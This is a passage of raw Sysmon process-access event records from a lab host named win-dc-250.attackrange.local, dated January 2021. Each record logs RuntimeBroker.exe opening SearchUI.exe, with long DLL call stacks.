d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011989Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.935{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011988Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.935{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011987Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.935{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011986Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.935{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011985Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.935{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011984Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.935{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011983Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.935{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011982Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.935{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011981Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.935{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011980Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.935{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011979Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.935{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011978Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.935{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011977Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011976Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011975Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011974Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011973Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165876C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.onecore.dll+15d2f|C:\Windows\system32\windows.cortana.onecore.dll+15e27|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000011972Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011971Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011970Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165876C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.onecore.dll+16e7e|C:\Windows\system32\windows.cortana.onecore.dll+15cb7|C:\Windows\system32\windows.cortana.onecore.dll+15e27|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86 10341000x800000000000000011969Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 